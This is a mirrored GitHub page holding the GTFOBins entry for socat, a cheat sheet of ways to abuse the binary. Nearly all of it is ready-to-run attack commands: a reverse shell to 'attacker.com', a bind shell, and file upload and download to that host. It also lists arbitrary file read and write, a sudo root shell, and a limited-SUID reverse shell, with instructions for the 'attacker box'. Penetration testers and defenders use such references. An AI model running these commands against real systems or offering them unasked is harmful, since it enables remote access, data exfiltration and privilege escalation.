GTFOBins.github.io/_gtfobins/socat.md at 6288a70884b6272686fb0f61c4151f42d00defc2

mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2025-11-04 10:48:50 +01:00

Files

Insecurities 28c6924beb Add socat file-read/write

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>

2021-10-27 08:43:44 +02:00

functions

shell

reverse-shell

bind-shell

file-upload

file-download

file-read

file-write

sudo

limited-suid

description	code
The resulting shell is not a proper TTY shell and lacks the prompt.	socat stdin exec:/bin/sh

description	code
Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.	RHOST=attacker.com RPORT=12345 socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane

description	code
Run ``socat FILE:`tty`,raw,echo=0 TCP:target.com:12345`` on the attacker box to connect to the shell.	LPORT=12345 socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane

description	code
Run ``socat -u tcp-listen:12345,reuseaddr open:file_to_save,creat`` on the attacker box to collect the file.	RHOST=attacker.com RPORT=12345 LFILE=file_to_send socat -u file:$LFILE tcp-connect:$RHOST:$RPORT

description	code
Run ``socat -u file:file_to_send tcp-listen:12345,reuseaddr`` on the attacker box to send the file.	RHOST=attacker.com RPORT=12345 LFILE=file_to_save socat -u tcp-connect:$RHOST:$RPORT open:$LFILE,creat

code
LFILE=file_to_read socat -u "file:$LFILE" -

code
LFILE=file_to_write socat -u 'exec:echo DATA' "open:$LFILE,creat"

description	code
The resulting shell is not a proper TTY shell and lacks the prompt.	sudo socat stdin exec:/bin/sh

description	code
Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.	RHOST=attacker.com RPORT=12345 ./socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane